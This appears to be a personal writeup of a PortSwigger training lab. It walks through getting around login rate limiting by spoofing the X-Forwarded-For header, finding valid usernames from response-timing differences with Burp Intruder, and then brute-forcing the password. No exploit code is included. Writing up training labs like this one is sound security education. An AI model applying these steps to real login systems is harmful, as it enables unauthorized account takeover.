Daemon Of Hacking
  • WELCOME!
    • 👋/home/usr/KruKnight
  • METHODOLOGIES & RESOURCES
    • Passwords & Attacks
    • Post Exploitation
      • 👀Situational Awareness
      • 🖥️Privilege Escalation
        • Linux Privilege Escalation
        • Windows Privilege Escalation
  • Writeups
    • CyCtf 2024
      • Vending Machine
      • Aerospace
      • OhMyCell
    • Portswigger Labs
      • Authentication
        • Username enumeration via different responses
        • 2FA simple bypass
        • Password reset broken logic
        • Username enumeration via subtly different responses
        • Username enumeration via response timing
        • Broken Brute-Force Protection, IP Block
        • Username enumeration via account lock
        • 2FA broken logic
        • Brute-forcing a stay-logged-in cookie
        • Offline password cracking
        • Password reset poisoning via middleware
        • Password brute-force via password change
        • Broken brute-force protection, multiple credentials per request
      • Os Command Injection
        • OS command injection, simple case
        • Blind OS command injection with time delays
        • Blind OS command injection with output redirection
        • Blind OS command injection with out-of-band interaction
        • Blind OS command injection with out-of-band data exfiltration
      • Cross-Origin Resource Sharing (CORS)
        • CORS vulnerability with basic origin reflection
        • CORS vulnerability with trusted null origin
        • CORS vulnerability with trusted insecure protocols
      • Server-side template injection
        • Basic server-side template injection
        • Basic server-side template injection (code context)
      • Server-Side Request Forgery (SSRF)
        • Basic SSRF against the local server
        • Basic SSRF against another back-end
        • Blind SSRF with out-of-band detection
        • SSRF with blacklist-based input filter
        • SSRF with filter bypass via open redirection vulnerability
      • Path Traversal
  • 🟩HTB Writeups
    • Heal
Powered by GitBook
On this page
  • Walkthrough
  • Step 1: Initial Observations
  • Step 2: Capturing and Analyzing the Login Request
  • Step 3: Bypassing Rate Limiting
  • Step 4: Exploiting Timing Differences
  • Step 5: Configuring Burp Intruder
  • Step 6: Analyzing the Results
  • Step 7: Brute-Forcing the Password
  • Step 8: Validating the Results

Was this helpful?

  1. Writeups
  2. Portswigger Labs
  3. Authentication

Username enumeration via response timing

PreviousUsername enumeration via subtly different responsesNextBroken Brute-Force Protection, IP Block

Last updated 6 months ago

Was this helpful?

Lab Description

Walkthrough

Step 1: Initial Observations

  • Upon visiting the login page, entering arbitrary credentials results in a rate-limiting error after multiple failed attempts, stating that you must wait 30 minutes.

  • This indicates brute-force protection is enabled.

Step 2: Capturing and Analyzing the Login Request

  1. Use Burp Suite to intercept the login request with arbitrary credentials such as test:test.

  2. The intercepted request contains two key parameters:

    • Username: The entered username.

    • Password: The entered password.

  3. Send this intercepted request to Intruder for automation.

Step 3: Bypassing Rate Limiting

  • Based on the lab hint, the rate limiting can be bypassed by manipulating the X-Forwarded-For header to spoof the IP address.

  • Test different headers until X-Forwarded-For successfully allows bypassing the rate-limiting mechanism.

The X-Forwarded-For header is commonly used by proxies to indicate the original IP address of a client. In this lab, the server uses it to track IP addresses for rate limiting. By modifying the X-Forwarded-For value to a unique one in each request, we effectively tricked the server into thinking that the requests were coming from different clients. This bypassed the IP-based rate-limiting mechanism, allowing us to continue brute-forcing without restrictions.

Step 4: Exploiting Timing Differences

The lab leverages a timing-based username enumeration vulnerability:

  • When a valid username is entered, the server spends additional time verifying the password hash.

  • For invalid usernames, the server rejects the request immediately after checking the username

you can read further about hashes at Passwords & Attacks

Step 5: Configuring Burp Intruder

  1. Mark Payload Positions:

    • Mark X-Forwarded-For and username as payload positions.

    • Use a long password to maximize the timing difference when hashing valid usernames.

  2. Set Payload Sets:

    • Payload Set 1 (X-Forwarded-For): Generate sequential numbers or IP addresses to bypass rate limiting.

    • Payload Set 2 (Username): Use the provided wordlist of usernames.

  3. Attack Type:

    • Select Pitchfork Attack to test both payloads simultaneously.

Step 6: Analyzing the Results

  • After executing the attack, observe the response times for each username.

  • Identify the username with a noticeably longer response time. This indicates a valid username.

Step 7: Brute-Forcing the Password

  1. Update the request in Burp Suite with the identified valid username.

  2. Mark the password parameter as the payload position.

  3. Load the provided password wordlist into Intruder.

Start the attack and observe the results.

  • A 302 Found response indicates a successful login.

Step 8: Validating the Results

  • Use the identified valid username and password to log into the application.

  • Access the account page to confirm successful exploitation.